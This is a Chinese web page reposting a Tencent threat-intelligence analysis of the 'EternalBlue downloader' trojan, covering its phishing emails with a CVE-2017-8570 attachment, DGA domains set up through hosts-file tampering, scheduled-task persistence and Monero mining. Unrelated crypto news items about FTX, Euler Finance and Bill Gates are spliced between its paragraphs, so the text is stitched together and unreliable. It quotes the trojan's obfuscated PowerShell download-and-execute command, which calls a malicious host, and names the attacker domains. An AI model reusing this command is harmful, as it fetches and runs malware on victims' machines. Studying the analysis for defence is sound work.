“永恒之藍下載器木馬”新增釣魚郵件傳播，利用用戶機器挖礦門羅幣_FTX:COM

Author：

Time：1900/1/1 0:00:00

來源：騰訊御見威脅情報中心

編者注：原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播，附件含CVE-2017-8570漏洞攻擊代碼》

“永恒之藍”下載器木馬在感染用戶機器上運行后，會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔，該文檔附帶CVE-2017-8570漏洞攻擊代碼。

如果被攻擊用戶收到郵件并不慎打開文檔，就可能觸發漏洞執行Powershell命令下載mail.jsp：

加密交易所FTX獲得歐洲投資公司牌照:金色財經報道，加密貨幣交易所巨頭FTX表示，其歐洲部門已獲得在該地區作為投資公司運營的許可證。根據周四發布的一份聲明，塞浦路斯證券交易委員會授予FTX塞浦路斯投資公司許可證。據該公司稱，這要求FTX Europe符合歐盟MiFID II指令中概述的標準，包括有關客戶資金隔離和保護、業務透明度和資本充足率的標準。?塞浦路斯許可證允許FTX服務于整個歐洲經濟區，包括歐盟、冰島、列支敦士登和挪威。FTX表示，它是唯一一家在完整的MiFID II許可下提供全套交易服務的加密貨幣交易所。?

FTX 首席執行官SBF在聲明中表示：在歐盟獲得該許可證是實現我們成為世界上最受監管的交易所之一的目標的重要一步。[2022/9/18 7:04:19]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

Euler Finance完成3200萬美元融資，Haun Ventures領投:金色財經消息，基于以太坊的借貸協議Euler Finance完成3200萬美元融資，Haun Ventures領投，Variant、FTX Ventures和Jump Crypto等參投。Euler表示，將于今年晚些時候推出DAO，使用戶能夠對Euler的開發和運營進行治理，并決定如何使用其社區金庫。（TheBlock）[2022/6/7 4:09:01]

而下載使用的域名ap35nf7.jp實際上并沒有注冊，但是依然能夠解析到地址：t.awcna.com，是因為被感染機器的本地hosts文件被篡改，使得隨機生成的域名映射到木馬使用的惡意地址，細節請參考御見威脅情報中心此前發布的報告：《“永恒之藍下載器”木馬篡改hosts指向隨機域名，再用多個漏洞攻擊內網挖礦》。

比爾·蓋茨：沒有投資任何加密資產:金色財經報道，在Reddit最近舉行的“問我任何問題”(Ask Me Anything)會議上，這位微軟(Microsoft)創始人、全球第四富有的人表示，他沒有投資任何加密資產。他表示，只投資于有價值功能的資產。蓋茨認為公司的價值是基于偉大產品的生產，而加密貨幣的價值，在他看來，僅僅是基于對未來會有人為它們買單的猜測。

蓋茨長期以來一直對加密貨幣持懷疑態度。在今年2月接受彭博社(Bloomberg)采訪時，這位億萬富翁還表示，他擔心越來越多的人被卷入了炒作的加密世界。（u.today）[2022/5/20 3:31:24]

本次攻擊過程中，木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp經過高度混淆，多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行，并使用了新的計劃任務名：

“Bluetea“藍茶。

“永恒之藍”下載器木馬自出現之后從未停止更新，從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺，并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上，最初通過供應鏈攻擊積累一批感染機器后，又不斷利用”永恒之藍”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法進行擴散傳播，近期又增加了DGA域名攻擊和釣魚郵件攻擊，其最終目的只為利用用戶機器挖礦門羅幣獲利。

永恒之藍下載器木馬的歷次版本更新參考下表：